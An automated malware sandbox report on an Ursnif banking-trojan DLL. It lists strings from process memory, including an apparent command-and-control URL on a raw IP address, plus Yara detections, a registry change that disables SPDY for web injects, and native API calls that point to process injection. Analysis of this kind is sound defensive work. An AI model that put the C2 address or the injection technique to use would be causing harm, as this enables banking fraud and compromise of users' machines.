Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 0000001E.00000002.704428444.000000000457B000.00000004.00000001.sdmp	String found in binary or memory: https://185.156.172.54/images/4bt_2F_2BiCS/_2BmnNrKQCK/z500RZDugibq5D/lzhEFX0aQWP4KyH_2Bwiq/KWi3Eifx
Source: explorer.exe, 0000001E.00000000.508762764.000000000E5A1000.00000004.00000040.sdmp	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: powershell.exe, 00000017.00000002.545875762.0000028A10065000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.545875762.0000028A10065000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.545875762.0000028A10065000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: RuntimeBroker.exe, 00000027.00000000.500013121.0000021912EF9000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: RuntimeBroker.exe, 00000027.00000000.500013121.0000021912EF9000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: explorer.exe, 0000001E.00000000.508762764.000000000E5A1000.00000004.00000040.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: RuntimeBroker.exe, 00000027.00000000.500013121.0000021912EF9000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: powershell.exe, 00000017.00000002.522033208.0000028A0020E000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.545875762.0000028A10065000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6SFRQ.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJwoCz.img?h=75&w=100
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14EN7h.img?h=368&w=6
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ardZ3.img?h=16&w=16
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bUhZr.img?h=368&w=6
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bV0ZF.img?h=166&w=3
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bVTlI.img?h=166&w=3
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bVl2Y.img?h=166&w=3
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bW83y.img?h=333&w=3
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1bWhsC.img?h=333&w=3
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Hzy.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBK9Ri5.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-8
Source: explorer.exe, 0000001E.00000000.507812256.000000000D4C0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/o
Source: explorer.exe, 0000001E.00000000.499070200.0000000008430000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpMSN
Source: explorer.exe, 0000001E.00000000.499788442.0000000008552000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpZ
Source: RuntimeBroker.exe, 00000027.00000000.500013121.0000021912EF9000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy

Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000002.532393287.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346665065.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346762135.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346591933.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346712408.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.490922654.000001ED55336000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346417089.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.405016881.000000000572C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.696291358.0000021913236000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346784908.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346795149.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.465913433.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346535972.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.705764448.0000000004E16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.490298727.0000000000916000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5548, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4724, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6712, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4540, type: MEMORY

Creates a DirectInput object (often for capturing keystrokes)

Source: loaddll32.exe, 00000000.00000002.690656747.000000000084B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000002.532393287.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346665065.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346762135.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346591933.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346712408.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.490922654.000001ED55336000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346417089.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.405016881.000000000572C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.696291358.0000021913236000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346784908.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346795149.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.465913433.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346535972.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.705764448.0000000004E16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.490298727.0000000000916000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5548, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4724, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6712, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4540, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

PE file has a writeable .text section

Source: 5fd885c499439tar.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FA71B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_04FA71B9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FA79B3 NtMapViewOfSection,	1_2_04FA79B3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FA7B01 GetProcAddress,NtCreateSection,memset,	1_2_04FA7B01
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FAB2FD NtQueryVirtualMemory,	1_2_04FAB2FD
Source: C:\Windows\explorer.exe	Code function: 30_2_04DFF0C0 NtAllocateVirtualMemory,	30_2_04DFF0C0
Source: C:\Windows\explorer.exe	Code function: 30_2_04E010A0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,	30_2_04E010A0
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF8800 NtQuerySystemInformation,	30_2_04DF8800
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF2DC4 NtQueryInformationProcess,	30_2_04DF2DC4
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF72AC NtWriteVirtualMemory,	30_2_04DF72AC
Source: C:\Windows\explorer.exe	Code function: 30_2_04E06A5C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	30_2_04E06A5C
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF8208 RtlAllocateHeap,NtQueryInformationProcess,	30_2_04DF8208
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF0BE8 NtReadVirtualMemory,	30_2_04DF0BE8
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE8790 NtCreateSection,	30_2_04DE8790
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF13A8 NtMapViewOfSection,	30_2_04DF13A8
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF23A4 NtQueryInformationProcess,	30_2_04DF23A4
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE2710 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	30_2_04DE2710
Source: C:\Windows\explorer.exe	Code function: 30_2_04E1A003 NtProtectVirtualMemory,NtProtectVirtualMemory,	30_2_04E1A003
Source: C:\Windows\System32\control.exe	Code function: 31_2_009010A0 NtQueryInformationToken,NtQueryInformationToken,NtClose,	31_2_009010A0
Source: C:\Windows\System32\control.exe	Code function: 31_2_008FF0C0 NtAllocateVirtualMemory,	31_2_008FF0C0
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F72AC NtWriteVirtualMemory,	31_2_008F72AC
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F8208 NtQueryInformationProcess,	31_2_008F8208
Source: C:\Windows\System32\control.exe	Code function: 31_2_00906A5C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	31_2_00906A5C
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E8790 NtCreateSection,	31_2_008E8790
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F13A8 NtMapViewOfSection,	31_2_008F13A8
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F23A4 NtQueryInformationProcess,	31_2_008F23A4
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F0BE8 NtReadVirtualMemory,	31_2_008F0BE8
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E2710 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	31_2_008E2710
Source: C:\Windows\System32\control.exe	Code function: 31_2_0091A003 NtProtectVirtualMemory,NtProtectVirtualMemory,	31_2_0091A003
